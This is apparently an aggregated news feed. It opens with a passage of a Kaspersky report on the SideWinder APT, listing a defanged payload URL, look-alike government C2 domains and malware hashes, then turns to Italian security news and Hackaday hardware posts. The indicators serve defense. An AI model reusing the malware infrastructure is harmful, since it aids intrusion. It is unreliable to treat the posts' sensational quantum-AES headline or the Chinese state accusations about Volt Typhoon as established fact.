Similar to
InstallerPayload, the malware creates a new service that launches Manage.exe. Manage.exe is a simple program that sleeps for 20 seconds and then generates an exception.
The service is configured to launch another program in case of failure. The second program,
"fsquirt.exe" or "write.exe", is a legitimate application that is used to sideload a malicious library, the Backdoor loader module component.
The encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code:
hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572
The received data are stored in a file with a random name and no extension.
Infrastructure
The attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically configure the malware to communicate with FQDN using specific subdomains with names that appear legitimate and are probably selected for relevance to the target. For example, the following is a small subset of subdomains used by the attacker.
Malicious domain or subdomain | Country | Legitimate domain | Legitimate owner |
nextgen[.]paknavy-govpk[.]net | Pakistan | www.paknavy.gov.pk | Pakistan Navy |
premier[.]moittpk[.]org | Pakistan | moitt.gov.pk | Ministry of Information Technology and Telecommunication of Pakistan |
cabinet-division-pk[.]fia-gov[.]com | Pakistan | cabinet.gov.pk | Cabinet Division of Pakistan |
navy-lk[.]direct888[.]net srilanka-navy[.]lforvk[.]com | Sri Lanka | navy.lk | Sri Lanka Navy |
portdjibouti[.]pmd-office[.]org | Djibouti | portdedjibouti.com | Port of Djibouti |
portdedjibouti[.]shipping-policy[.]info | Djibouti | portdedjibouti.com | Port of Djibouti |
mofa-gov-sa[.]direct888[.]net | Saudi Arabia | mofa.gov.sa | Ministry of Foreign Affairs, Kingdom of Saudi Arabia |
mod-gov-bd[.]direct888[.]net | Bangladesh | mod.gov.bd | Ministry of Defence, Bangladesh |
mmcert-org-mm[.]donwloaded[.]com | Myanmar | mmcert.org.mm | Myanmar CERT |
opmcm-gov-np[.]fia-gov[.]net | Nepal | opmcm.gov.np | Office of the Prime Minister & Council of Ministers of Nepal |
Each domain and its related subdomains are resolved with a dedicated IP address. The C2s are hosted on a VPS used exclusively by the attacker, but rented from different providers for a very short time. The attacker uses different service providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.
Victims
SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.
Targeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.
Attribution
We attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in these attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous SideWinder activity:
- The use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit CVE-2017-11882.
- The naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.
- The .NET Downloader component and the Backdoor loader module are similar to those described in the past.
- Last but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.
***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.
IOCs
Malicious documents
6cf6d55a3968e2176db2bba2134bbe94
c87eb71ff038df7b517644fa5c097eac
8202209354ece5c53648c52bdbd064f0
5cc784afb69c153ab325266e8a7afaf4
3a6916192106ae3ac7e55bd357bc5eee
54aadadcf77dec53b2566fe61b034384
8f83d19c2efc062e8983bce83062c9b6
8e8b61e5fb6f6792f2bee0ec947f1989
86eeb037f5669bff655de1e08199a554
1c36177ac4423129e301c5a40247f180
873079cd3e635adb609c38af71bad702
423e150d91edc568546f0d2f064a8bf1
4a5e818178f9b2dc48839a5dbe0e3cc1
Rtf
26aa30505d8358ebeb5ee15aecb1cbb0
3233db78e37302b47436b550a21cdaf9
8d7c43913eba26f96cd656966c1e26d5
d0d1fba6bb7be933889ace0d6955a1d7
e706fc65f433e54538a3dbb1c359d75f
Lnk
412b6ac53aeadb08449e41dccffb1abe දින සංශෝධන කර ගැනිම .lnk
2f4ba98dcd45e59fca488f436ab13501 Special Envoy Speech at NCA.jpg .lnk
Backdoor Loader
propsys.dll
b69867ee5b9581687cef96e873b775ff
c3ce4094b3411060928143f63701aa2e
e1bdfa55227d37a71cdc248dc9512296
ea4b3f023bac3ad1a982cace9a6eafc3
44dbdd87b60c20b22d2a7926ad2d7bea
7e97cbf25eef7fc79828c033049822af
vsstrace.dll
101a63ecdd8c68434c665bf2b1d3ffc7
d885df399fc9f6c80e2df0c290414c2f
92dd91a5e3dfb6260e13c8033b729e03
515d2d6f91ba4b76847301855dfc0e83
3ede84d84c02aa7483eb734776a20dea
2011658436a7b04935c06f59a5db7161
StealerBot
3a036a1846bfeceb615101b10c7c910e Orchestrator
47f51c7f31ab4a0d91a0f4c07b2f99d7 Keylogger
f3058ac120a2ae7807f36899e27784ea Screenshot grabber
0fbb71525d65f0196a9bfbffea285b18 File stealer
1ed7ad166567c46f71dc703e55d31c7a Live Console
2f0e150e3d6dbb1624c727d1a641e754 RDP Credential Stealer
bf16760ee49742225fdb2a73c1bd83c7 RDP Credential Stealer – Injected library
mscorlib.dll
b3650a88a50108873fc45ad3c249671a Token Grabber
4c40fcb2a12f171533fc070464db96d1 Credential Phisher – Injected library
eef9c0a9e364b4516a83a92592ffc831 UACBypass
SyncBotServiceHijack.dll
1be93704870afd0b22a4475014f199c3
Service Hijack
f840c721e533c05d152d2bc7bf1bc165 Manage.exe
Backdoor Loader devobj.dll
5718c0d69939284ce4f6e0ce580958df
Domains and IPs
126-com[.]live
163inc[.]com
afmat[.]tech
alit[.]live
aliyum[.]tech
aliyumm[.]tech
asyn[.]info
ausibedu[.]org
bol-south[.]org
cnsa-gov[.]org
colot[.]info
comptes[.]tech
condet[.]org
conft[.]live
dafpak[.]org
decoty[.]tech
defenec[.]net
defpak[.]org
detru[.]info
dgps-govpk[.]co
dgps-govpk[.]com
dinfed[.]co
dirctt88[.]co
dirctt88[.]net
direct888[.]net
direct88[.]co
directt888[.]com
donwload-file[.]com
donwloaded[.]com
donwloaded[.]net
dowmload[.]net
downld[.]net
download-file[.]net
downloadabledocx[.]com
dynat[.]tech
dytt88[.]org
e1ix[.]mov
e1x[.]tech
fia-gov[.]com
fia-gov[.]net
gov-govpk[.]info
govpk[.]info
govpk[.]net
grouit[.]tech
gtrec[.]info
healththebest[.]com
jmicc[.]xyz
kernet[.]info
kretic[.]info
lforvk[.]com
mfa-gov[.]info
mfa-gov[.]net
mfa-govt[.]net
mfacom[.]org
mfagov[.]org
mfas[.]pro
mitlec[.]site
mod-gov-pk[.]live
mofa[.]email
mofagovs[.]org
moittpk[.]net
moittpk[.]org
mshealthcheck[.]live
nactagovpk[.]org
navy-mil[.]co
newmofa[.]com
newoutlook[.]live
nopler[.]live
ntcpak[.]live
ntcpak[.]org
ntcpk[.]info
ntcpk[.]net
numpy[.]info
numzy[.]net
nventic[.]info
office-drive[.]live
pafgovt[.]com
paknavy-gov[.]org
paknavy-govpk[.]info
paknavy-govpk[.]net
pdfrdr-update[.]com
pdfrdr-update[.]info
pmd-office[.]com
pmd-office[.]live
pmd-office[.]org
ptcl-net[.]com
scrabt[.]tech
shipping-policy[.]info
sjfu-edu[.]co
support-update[.]info
tazze[.]co
tex-ideas[.]info
tni-mil[.]com
tsinghua-edu[.]tech
tumet[.]info
u1x[.]co
ujsen[.]net
update-govpk[.]co
updtesession[.]online
widge[.]info
securelist.com/sidewinder-apt/…
Beyond the Surface: the evolution and expansion of the SideWinder APT group
Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post-exploitation tools and techniques.GReAT (Kaspersky)
Nuove guerre stellari, perché Russia e Cina potrebbero usare l’atomica nello spazio
@Notizie dall'Italia e dal mondo
[quote]Era l’ottobre del 1967 quando l’Outer space treaty (Ots), il trattato internazionale sui princìpi che governano le attività degli Stati in materia di esplorazione ed utilizzazione dello spazio extra-atmosferico, entrò in vigore. Il trattato, redatto all’inizio della space era e in piena
Notizie dall'Italia e dal mondo reshared this.
Al via in nord Europa i war games nucleari della NATO. Ci sono cacciabombardieri italiani.
@Notizie dall'Italia e dal mondo
Le esercitazioni coinvolgono caccia capaci di trasportare testate atomiche Usa. Proseguiranno per due settimane nei cieli di Belgio, Paesi Bassi, UK e Danimarca. Vi partecipano velivoli di 13 paesi tra cui l'Italia con i "Tornado"
Notizie dall'Italia e dal mondo reshared this.
Modular Magnetic LED Matrix
[bitluni] seems rather fond of soldering lots of LEDs, and fortunately for us the result is always interesting eye candy. The latest iteration of this venture features 8 mm WS2812D-F8 addressable LEDs, offering a significant simplification in electronics and the potential for much brighter displays.
The previous version used off-the-shelf 8×8 LED panels but had to be multiplexed, limiting brightness, and required a more complex driver circuit. To control the panel, [bitluni] used the ATtiny running the MegaTinyCore Arduino core. Off-the-shelf four-pin magnetic connectors allow the panels to snap together. They work well but are comically difficult to solder since they keep grabbing the soldering iron. [bitluni] also created a simple battery module and 3D printed neat enclosures for everything.
Having faced the arduous task of fixing individual LEDs on massive LED walls in the past, [bitluni] experimented with staggered holes that allow through-hole LEDs to be plugged in without soldering. Unfortunately, with long leads protruding from the back of the PCB, shorting became an immediate issue. While he ultimately resorted to soldering them for reliability, we’re intrigued by the potential of refining this pluggable design.
The final product snapped together satisfyingly, and [bitluni] programmed a simple animation scheme that automatically updates as panels are added or removed. What would you use these for? Let us know in the comments below.
youtube.com/embed/L2J_eNgjxio?…
Quantum Computing: La crittografia AES è stata violata? L’esperimento riuscito dell’Università di Shanghai
Un team di scienziati in Cina ha effettuato il primo attacco quantistico “efficace” al mondo contro un metodo di crittografia classico. L’attacco è stato effettuato utilizzando un computer quantistico standard della società canadese D-Wave Systems, scrive il South China Morning Post .
Gli scienziati sono riusciti a decifrare con successo algoritmi crittografici ampiamente utilizzati in settori critici come quello bancario e militare, avvertendo che il risultato rappresenta una “minaccia reale e significativa”.
Lo studio è stato condotto da Wang Chao dell’Università di Shanghai. Hanno attaccato gli algoritmi SPN (Substitution-Permutation Network) come Present, Gift-64 e Rectangle.
Gli algoritmi SPN sono alla base dello standard di crittografia AES (Advanced Encryption Standard), con AES-256 talvolta chiamato “standard militare” e considerato resistente agli attacchi quantistici.
I dettagli della metodologia dell’attacco rimangono poco chiari e Wang ha rifiutato di rivelare ulteriori dettagli in un’intervista al South China Morning Post a causa della “sensibilità” dell’argomento. Tuttavia, i ricercatori hanno avvertito che decifrare il codice è più vicino che mai.
“Questa è la prima volta che un vero computer quantistico rappresenta una minaccia reale e significativa per molti algoritmi SPN in uso oggi”, afferma un articolo sottoposto a revisione paritaria pubblicato sul Chinese Journal of Computers.
D-Wave Systems afferma di essere il primo fornitore commerciale al mondo di computer quantistici. Tra i suoi clienti figurano Lockheed Martin, NASA e Google.
La maggior parte dei sistemi quantistici universali esistenti non sono ancora considerati sufficientemente avanzati da rappresentare una minaccia per la crittografia moderna. Si prevede che le macchine quantistiche “utili” appariranno solo tra pochi anni.
Tuttavia, la potenziale capacità dei computer quantistici di risolvere problemi complessi e di violare la maggior parte degli algoritmi a chiave pubblica è motivo di preoccupazione. A questo proposito, si stanno compiendo sforzi per creare una crittografia “resistente ai quanti”.
All’inizio di quest’anno, il National Institute of Standards and Technology (NIST) ha rilasciato una serie di algoritmi di crittografia di base progettati per proteggere dai futuri attacchi informatici generati dai computer quantistici.
L'articolo Quantum Computing: La crittografia AES è stata violata? L’esperimento riuscito dell’Università di Shanghai proviene da il blog della sicurezza informatica.
Braccio982 likes this.
Braccio982 reshared this.
IntelBroker rivendica Attacco a Cisco: violati codici sorgente e documenti riservati
Cisco ha avviato un’indagine su una possibile fuga di dati dopo che sul forum underground Breach Forums il criminale informatico IntelBroker ha messo in vendita di informazioni rubate all’azienda.
Un portavoce dell’azienda ha affermato che Cisco è a conoscenza del fatto che una persona sconosciuta afferma di avere accesso a determinati file aziendali. Un’indagine è attualmente in corso per valutare la violazione, ma non è stata ancora completata.
L’hacking è stato segnalato per la prima volta da un noto aggressore con il nome utente “IntelBroker”, il quale sostiene di aver violato Cisco insieme ad altri due hacker, “EnergyWeaponUser” e “zjj”, il 10 giugno e di aver rubato grandi quantità di dati relativi allo sviluppo dei prodotti dell’azienda.
I dati compromessi da come viene riportato sarebbero: progetti Github, Gitlab, SonarQube, codice sorgente, credenziali hardcoded, certificati, SRC client, documenti riservati Cisco, ticket Jira, token API, contenitori privati AWS, SRC della tecnologia Cisco, build Docker, contenitori di archiviazione di Azure, chiavi private e pubbliche , certificati SSL, informazioni sui prodotti Cisco Premium.
Post di IntelBroker sul furto di dati Cisco
IntelBroker ha inoltre pubblicato campioni dei dati presumibilmente rubati, inclusi database, informazioni sui clienti e screenshot dei portali di gestione dei clienti. L’aggressore non ha però spiegato come sia riuscito ad accedere ai dati.
Secondo fonti a conoscenza dell’incidente, le informazioni sono state rubate da un fornitore terzo di servizi gestiti per DevOps e sviluppo software.
Al momento non ci sono informazioni definitive sul fatto che la violazione di Cisco sia collegata a precedenti incidenti di giugno, tra cui T-Mobile, AMD e Apple.
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
L'articolo IntelBroker rivendica Attacco a Cisco: violati codici sorgente e documenti riservati proviene da il blog della sicurezza informatica.
Cina: Gli USA usano il cyberspazio per spiare e diffamare altri Paesi
Pechino, 14 ottobre — In risposta a un rapporto pubblicato dalle agenzie cinesi che ha rivelato come gli Stati Uniti abbiano occultato i propri attacchi informatici accusando altri Paesi, il portavoce del Ministero degli Esteri, Mao Ning, ha dichiarato il 14 ottobre che la Cina esorta gli Stati Uniti a cessare immediatamente gli attacchi informatici a livello globale e a smettere di utilizzare questioni legate alla sicurezza informatica per diffamare la Cina.
Durante una conferenza stampa, un giornalista ha chiesto: “Abbiamo notato che un recente rapporto, pubblicato dal Centro Nazionale Cinese di Risposta alle Emergenze per Virus Informatici, dal Laboratorio Nazionale di Ingegneria per la Prevenzione dei Virus Informatici e dalla 360 Company, ha svelato che gli Stati Uniti hanno amplificato il nome dell’organizzazione ‘Volt Typhoon’ per nascondere i propri attacchi informatici, incolpando altri Paesi. Qual è il commento della Cina su questo?”
Mao Ning ha spiegato che le agenzie cinesi hanno già pubblicato due rapporti in passato, rivelando che il cosiddetto ‘Volt Typhoon’ è in realtà una copertura per un’organizzazione internazionale di ransomware che agisce per ottenere fondi dal Congresso e contratti governativi. Le agenzie di intelligence statunitensi, insieme a società di sicurezza informatica, hanno cospirato per diffondere false informazioni e incolpare la Cina. Il nuovo rapporto ha svelato ulteriori dettagli scioccanti.
Mao Ning ha sottolineato che, primo, gli Stati Uniti utilizzano tecnologie avanzate per falsificare attacchi informatici, inserendo stringhe in cinese o in altre lingue per sviare le indagini e incolpare altri Paesi. “È interessante notare”, ha aggiunto, “che Guam, presunta vittima di un attacco informatico statunitense attribuito a ‘Volt Typhoon’, è anche il centro di numerosi attacchi informatici contro la Cina e altri Paesi del sud-est asiatico.”
In secondo luogo, ha affermato Mao, gli Stati Uniti sfruttano la loro posizione privilegiata nei cavi sottomarini per condurre sorveglianza su larga scala e furto di dati a livello mondiale. Ironia della sorte, durante l’Assemblea Generale delle Nazioni Unite di quest’anno, gli Stati Uniti hanno radunato alcuni alleati per rilasciare una dichiarazione congiunta in cui si impegnavano a garantire la sicurezza dei cavi sottomarini.
In terzo luogo, ha continuato Mao, gli Stati Uniti non hanno mai smesso di spiare i propri alleati, come la Germania. Nel 2022, gli Stati Uniti e l’Europa hanno concordato un nuovo quadro per la trasmissione transatlantica dei dati, promettendo di migliorare la supervisione delle attività di furto informatico in Europa, ma continuano a obbligare le aziende a trasferire dati verso gli Stati Uniti attraverso il Foreign Intelligence Surveillance Act. Ciò consente loro di accedere ai dati degli utenti di Internet in Germania e in altri Paesi.
In quarto luogo, Mao ha denunciato la complicità di alcune grandi aziende tecnologiche statunitensi nel supportare il governo americano. Mentre gli Stati Uniti accusano altri Paesi di prepararsi ad attacchi informatici, collaborano con aziende tecnologiche per preinstallare backdoor nei prodotti di rete, lanciando così attacchi contro la catena di approvvigionamento globale. Alcune di queste aziende, ha detto, cooperano attivamente nel diffondere false narrazioni su presunti “attacchi di hacker cinesi” per profitto.
Mao Ning ha concluso sottolineando che i fatti emersi nel rapporto dimostrano chiaramente chi rappresenta la maggiore minaccia alla sicurezza del cyberspazio globale. Finora, il governo degli Stati Uniti non solo ha ignorato il rapporto, ma ha anche continuato a diffondere false informazioni, come nel caso di ‘Volt Typhoon’.
“La Cina condanna fermamente questo comportamento irresponsabile degli Stati Uniti ed esorta gli Stati Uniti a cessare immediatamente gli attacchi informatici a livello globale e a smettere di utilizzare le questioni di sicurezza informatica come pretesto per diffamare la Cina”, ha dichiarato Mao Ning.
L'articolo Cina: Gli USA usano il cyberspazio per spiare e diffamare altri Paesi proviene da il blog della sicurezza informatica.
What Actually Causes Warping In 3D Prints?
The 3D printing process is cool, but it’s also really annoying at times. Specifically, when you want to get a part printed, and no matter how you orientate things, what adhesion aids you use or what slicer settings you tweak, it just won’t print right. [David Malawey] has been thinking a little about the problem of the edges of wide prints tending to curl upwards, and we believe they may be on to something.
Obviously, we’re talking about the lowest common denominator of 3D printing, FDM, here. Other 3D printing technologies have their gotchas. Anyway, when printing a wide object, edge curling or warping is a known annoyance. Many people will just try it and hope for the best. When a print’s extreme ends start peeling away from the heat bed, causing the print to collide with the head, they often get ripped off the bed and unceremoniously ejected onto the carpet. Our first thought will be, “Oh, bed adhesion again”, followed by checking the usual suspects: bed temperature, cleanliness and surface preparation. Next, we might add a brim or some sacrificial ‘bunny ears’ to keep those pesky edges nailed down. Sometimes this works, but sometimes not. It can be frustrating. [David] explains in the YouTube short how the contraction of each layer of materials is compounded by its length, and these stresses accumulate as the print layers build. A simple demonstration shows how a stack of stressed sections will want to curl at the ends and roll up inwards.
This mechanism would certainly go some way to explain the way these long prints behave and why our mitigation attempts are sometimes in vain. The long and short of it is to fix the issue at the design stage, to minimize those contraction forces, and reduce the likelihood of edge curling.
Does this sound familiar? We thought we remembered this, too, from years ago. Anyway, the demonstration was good and highlighted the issue well.
youtube.com/embed/8bF8jxYwUM4?…
Thanks to [Keith] for the tip!
Allarme Open Source. Il punto di non ritorno è superato. +150% di Pacchetti Dannosi in Un Anno
Il numero di pacchetti dannosi nell’ecosistema open source è aumentato in modo significativo nell’ultimo anno, come evidenziato da un nuovo rapporto di Sonatype. Gli esperti hanno notato che il numero di componenti dannosi caricati intenzionalmente in repository open source è aumentato di oltre il 150% rispetto all’anno precedente.
Il software open source, basato su un processo di sviluppo trasparente con la possibilità per chiunque di contribuire, è la base della maggior parte delle moderne tecnologie digitali. Il rapporto Sonatype ha analizzato più di 7 milioni di progetti, di cui oltre 500mila contenenti componenti dannosi.
I problemi con le vulnerabilità nei pacchetti open source e le difficoltà incontrate dagli sviluppatori nel supportarli sono diventati un vero problema negli ultimi anni a causa di una serie di gravi attacchi informatici e di vulnerabilità identificate. Un esempio è stato il recente incidente che ha coinvolto lo strumento di compressione dati XZ Utilis. Da anni i criminali informatici cercano di introdurre vulnerabilità in strumenti diffusi in modo che finisca su numerosi server in tutto il mondo.
Come notano gli esperti, il problema non risiede solo negli attacchi stessi, ma anche nell’approccio degli editori e dei consumatori di soluzioni open source.
Nella fretta di rilasciare rapidamente nuove versioni e funzionalità, la sicurezza viene spesso trascurata. Di conseguenza, le vulnerabilità critiche rimangono irrisolte per molto tempo. È noto, ad esempio, che anche anni dopo la scoperta del problema nel componente Log4Shell, circa il 13% dei suoi download contiene ancora versioni vulnerabili.
In media, sono necessari fino a 500 giorni per correggere le vulnerabilità critiche, un periodo significativamente più lungo rispetto al precedente periodo di 200-250 giorni. I bug meno gravi richiedono ancora più tempo per essere risolti: in alcuni casi questo processo richiede più di 800 giorni, sebbene in precedenza tali periodi raramente superassero i 400 giorni.
Questi dati mostrano che la catena di fornitura del software ha raggiunto un punto critico in cui le risorse degli editori semplicemente non riescono a tenere il passo con il crescente numero di vulnerabilità. Inoltre, ciascun ecosistema di programmazione ha le proprie caratteristiche, il che rende difficile garantirne la protezione.
Ad esempio, negli ultimi anni il gestore pacchetti Node.js ha registrato un forte aumento dei pacchetti dannosi legati allo spam e alle criptovalute.
L'articolo Allarme Open Source. Il punto di non ritorno è superato. +150% di Pacchetti Dannosi in Un Anno proviene da il blog della sicurezza informatica.
𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻💻🍕 likes this.
A RISC-V LISP Compiler…Written In Lisp
Ah, Lisp, the archaic language that just keeps on giving. You either love or hate it, but you’ll never stop it. [David Johnson-Davies] is clearly in the love it camp and, to that end, has produced a fair number of tools wedging this language into all kinds of nooks and crannies. The particular nook in question is the RISC-V ISA, with their Lisp-to-RISC-V compiler. This project leads on from their RISC-V assembler by allowing a Lisp function to be compiled directly to assembly and then deployed as callable, provided you stick to the supported language subset, that is!
The fun thing is—you guessed it—it’s written in Lisp. In fact, both projects are pure Lisp and can be run on the uLisp core and deployed onto your microcontroller of choice. Because who wouldn’t want to compile Lisp on a Lisp machine? To add to the fun, [David] created a previous project targeting ARM, so you’ve got even fewer excuses for not being able to access this. If you’ve managed to get your paws on the new Raspberry Pi Pico-2, then you can take your pick and run Lisp on either core type and still compile to native.
The Lisp-Risc-V project can be found in this GitHub repo, with the other tools easy enough to locate.
We see a fair few Lisp projects on these pages. Here’s another bare metal Lisp implementation using AVR. And how many lines of code does it take to implement Lisp anyway? The answer is 42 200 lines of C, to be exact.
New Study Looks at the Potential Carcinogenicity of 3D Printing
We’ve all heard stories of the dangers of 3D printing, with fires from runaway hot ends or dodgy heated build plates being the main hazards. But what about the particulates? Can they actually cause health problems in the long run? Maybe, if new research into the carcinogenicity of common 3D printing plastics pans out.
According to authors [CheolHong Lim] and [DongSeok Seo], the research covered in this paper was undertaken because of reports of rare cancers among Korean STEM teachers, particularly those who used 3D printers in their curricula. It was thought that only long-term, continued exposure to the particulates generated by 3D printers could potentially be hazardous and that PLA was less likely to be hazardous than ABS. The study was designed to assess the potential carcinogenicity of both ABS and PLA particulates under conditions similar to what could be expected in an educational setting.
To do this, they generated particulates by heating ABS and PLA to extruder temperatures, collected and characterized them electrostatically, and dissolved them in the solvent DMSO. They used a cell line known as Balb/c, derived from fibroblasts of an albino laboratory mouse, to assess the cytotoxic concentration of each plastic, then conducted a comet assay, which uses cell shape as a proxy for DNA damage; damaged cells often take on a characteristically tailed shape that resembles a comet. This showed no significant DNA damage for either plastic.
But just because a substance doesn’t cause DNA damage doesn’t mean it can’t mess with the cell’s working in other ways. To assess this, they performed a series of cell transformation assays, which look for morphological changes as a result of treatment with a potential carcinogen. Neither ABS nor PLA were found to be carcinogenic in this assay. They also looked at the RNA of the treated cells, to assess the expression of genes related to carcinogenic pathways. They found that of 147 cancer-related genes, 113 were either turned up or turned down relative to controls. Finally, they looked at glucose metabolism as a proxy for the metabolic changes a malignant cell generally experiences, finding that both plastics increased metabolism in vitro.
Does this mean that 3D printing causes cancer? No, not by a long shot. But, it’s clear that under lab conditions, exposure to either PLA or ABS particulates seems to be related to some of the cell changes associated with carcinogenesis. What exactly this means in the real world remains to be seen, but the work described here at least sets the stage for further examination.
What does this all mean to the home gamer? For now, maybe you should at least crack a window while you’re printing.
The Greengate DS:3 Part 2: Putting a Retro Sampler to use
The Greengate DS:3 had been re-created in the form of the Goodgreat. Now [Bea Thurman] had to put it to use. If the Greengate DS:3 card was rare, the keyboard was nearly impossible to find. After a long search, [Bea] bought one all the way from Iceland. The card of course came courtesy of [Eric].
It was time to connect the two together. But there was a problem — a big problem. The GreenGate has a DB-25 connected via a ribbon cable to the board’s 2×10 connector. The keyboard that shipped with those cards would plug right in. Unfortunately, [Bea’s] keyboard had a DIP-40 IDC connector crimped on its ribbon cable. What’s more the connectors for the sustain and volume pedals were marked, but never drilled out. The GreenGate silk screen was still there though.
Maybe it was a prototype or some sort of modified hardware. Either way, the 40-pin DIP connector had to go if the keyboard ever were to work with the card. What followed were a few hours of careful wire tracing
Tracing out pins is always a pain. To make it worse, the only DB-25 connector [Bea] had on hand was an Insulation Displacement Connector (IDC). It’s the right part to use for the ribbon cable attached to the keyboard, but not what you’d want to use to test pinouts. These connectors are generally crimped once.
The GreenGate keyboard and foot pedals are matrix scanned – much like a standard alphanumeric keyboard. The keyboard also needed some internal cleanup after 40 years. Like many ‘boards of the day, it used small spring wires that made contact with a common bar. After some painstaking debugging, working directly with [Eric] on video chat, [Bea] had the system working. Now came the fun part — using the keyboard to make music.
The Greengate hardware is impressive, but the software is stunning. [Bea] got in touch with [Colin Green], who wrote it. He’s also the “green” in Greengate. With [Colin’s] software, Waveforms can be edited in an oscilloscope view, much like one would find in a modern DAW. The software even includes a pattern editor, which can be used for arpeggios.
The GreenGate has 4 notes of polyphony, is multitimbral, and can layer multiple samples across the keyboard. Considering this is all handled on an Apple II+ with a green screen monitor for a UI, impressive is an understatement.
[Bea] gives us a great walkthrough using the system. She starts by sampling audio from a cassette. With the audio in memory, she uses this to build a simple song. The entire setup made an appearance at VCF MidWest, so if you saw it in person let us know in the comments!
youtube.com/embed/ndeModWqjnQ?…
Solving a Retrocomputing Mystery with an Album Cover: Greengate DS:3
[Bea Thurman] had a retro music conundrum. She loved the classic Greengate DS:3 sampler, but couldn’t buy one, and couldn’t find enough information to build her own. [Bea’s] plea for help caught the attention of [Eric Schlaepfer], aka [TubeTime]. The collaboration that followed ultimately solved a decades-old mystery.
In the 1980s, there were two types of musicians: Those who could afford a Fairlight CMI and everyone else. If you were an Apple II owner, the solution was a Greengate DS:3. The DS:3 was a music keyboard and a sampler card for the Apple II+ (or better). The plug-in card was a bit mysterious, though. The cards were not very well documented, and only a few survive today. To make matters worse, some chips had part numbers sanded off. It was a bit of a mystery until [Bea and Tubetime] got involved.
Eric Schlaepfer
While [Bea] didn’t have the card itself, she had a photo of the board and a picture of an album that contained the key to everything. The Greengate came packed with a vinyl album, “Into Trouble with the Noise of Art.” An apt title, since the album art was the Greengate PCB top layer. Now if you know [Eric], you know he wrote the book (literally) on taking things apart and taking photos of them, even producing replicas.
Thoroughly nerdsniped, [Eric] loaded the photos KiCad and started tracing. With the entire top layer artwork and most of the bottom layer, the 8-bit card wasn’t too hard to figure out. The sticky point was one chip. A big 40-pin part with the numbers scrubbed off. One owner pulled the chip to check for fab information on the back, only to be greeted by a proper British “You Nosey S.O.B.” penciled on top of more sanded part numbers.
If the chip was an ASIC, the project would be blocked until they could get their hands on an actual board for analysis. An ASIC would have custom part numbers on it from the fab though – no need for sanding. It had to be something off the shelf. [Eric] used some context clues to determine that the Mystery chip had to be a DMA controller. This narrowed the field down. From there, he had to compare pinouts until he had a match with the venerable MC6844.
With the mystery part out of the way, [Eric] put the finishing touches on the PCB, saved it to his GitHub as the GoodGreat DS:3, and sent it off. A few days later, the bare boards arrived and were quickly populated with vintage parts. [Eric] ran a few tests and sent the card off to [Bea], where we will pick up with part 2.
At least the device wasn’t protected with a self-destruct code.
Decine di morti e feriti per i bombardamenti. “Piano dei Generali” per affamare il nord di Gaza
@Notizie dall'Italia e dal mondo
Uccisi 10 palestinesi in fila per il cibo a Jabalia. La Associated Press rivela il "Piano dei Generali" per affamare il nord di Gaza
L'articolo Decine di morti e feriti per i bombardamenti. “Piano dei Generali” per affamare il
Notizie dall'Italia e dal mondo reshared this.
Cina vs USA e FISA 702. Gli hacker di Volt Typhoon è una “farsa politica” per screditare la Cina?
Nel febbraio di quest’anno, la Camera dei Rappresentanti degli Stati Uniti ha tenuto un’udienza per discutere della presunta organizzazione di hacker sostenuta dal governo cinese, denominata “Volt Typhoon“, rivelata da Microsoft nel maggio 2023.
Secondo le autorità statunitensi, questa entità rappresenta una minaccia significativa per la sicurezza nazionale. Tuttavia, l’agenzia cinese per la sicurezza informatica ha pubblicato due rapporti, uno in aprile e l’altro in luglio 2023 (come riportato dal China Daily), sostenendo che l’iniziativa “Volt Typhoon” sia in realtà una manovra orchestrata dagli Stati Uniti per screditare la Cina.
Il 14 ottobre, la stessa agenzia ha rilasciato un terzo rapporto, accusando gli Stati Uniti e i paesi del gruppo “Five Eyes” di spionaggio informatico contro Cina, Germania e altre nazioni, oltre che di sorvegliare indiscriminatamente gli utenti di Internet a livello globale, smascherando quella che definiscono una “farsa politica” condotta dagli Stati Uniti.
Il Toolkit stealth Marble e lo spettro della 702
Il rapporto cinese rivela che gli Stati Uniti, da lungo tempo, hanno dispiegato unità di guerra cibernetica nei pressi di paesi rivali per effettuare operazioni di sorveglianza e penetrazione nei loro sistemi di rete. Inoltre, l’intelligence statunitense avrebbe sviluppato un toolkit stealth, con nome in codice “Marble“, concepito per nascondere la propria attività cyber offensiva e incolpare altre nazioni.
Questo toolkit, è considerato una risorsa di alto livello e segreto militare, sarebbe stato sviluppato almeno dal 2015 e include oltre 100 algoritmi di offuscamento per mascherare l’origine degli attacchi.
Grazie a questi strumenti, le truppe di guerra cibernetica statunitensi sarebbero in grado di mascherarsi sotto l’identità di altri stati e condurre attacchi informatici su scala globale, attribuendo poi la responsabilità di tali azioni a nazioni alleate o nemiche. Il rapporto sostiene che la creazione dell’entità “Volt Typhoon” sia una strategia per mantenere il controllo sulla Sezione 702 del “Foreign Intelligence Surveillance Act”, che consente una vasta sorveglianza senza limiti chiari, giustificando in questo modo una rete globale di monitoraggio.
Il controllo dei cavi sottomarini e il monitoraggio dei dati
